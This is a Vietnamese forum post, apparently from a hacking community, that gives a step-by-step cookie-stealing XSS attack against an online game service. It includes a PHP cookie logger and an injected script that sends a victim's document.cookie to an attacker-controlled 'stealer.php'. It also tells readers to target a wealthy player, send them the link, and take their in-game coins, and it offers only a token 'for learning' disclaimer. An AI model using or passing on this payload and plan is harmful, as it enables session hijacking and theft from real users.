Admin
Well-Known Member
Staff member
Administrator
P/S Cẩn thận ăn gạchMình không khuyến khích các bạn đi hack người ta vì cái này giúp bạn hiểu thêm về XSS thôi.
. Thấy hay thì thank không hay cũng thank.
Bắt đầu nào.
Bây giờ victim của ta là Document Moved
MÌnh không nói cách nào để tìm ra lỗi, vị trí của nó vì mình không muốn các bạn đi phá hoại.
[...]
-------------------
Điều kiện:
1 acc Document Moved
1 host hỗ trợ php
1 phần mềm truy cập web/wap
------------------
1. Vào host bạn tạo 1 file tên cookie.php
chứa
Code:tìm 1 nơi nào đó trên victim lỗi nhét cái này:PHP:$cookie=$_GET['cookie']; $log=fopen("cookies_aoanh.txt\",a); fwrite($log,$cookie."\n"); fclose($log); ?>
Code:sửa link tới file mình vừa tạo.PHP:<script> window.location = 'http://yoursite/stealer.php?cookie=' + document.cookie; </script>
Xong phần tìm lỗi rồi
BÂy giờ chúng ta qua phần hack nhe!
Dùng acc login vào và tìm 1 tên ngu ngốc nào đó có thật nhiều xu
Về việc làm gì với cái xu đó thì tùy các bạn.
Tặng cho hắn cái link tới file lỗi.
Còn việc pm gọi điện cho teamobi thì mình không có tiền và cũng không thích cách làm ăn của họ.
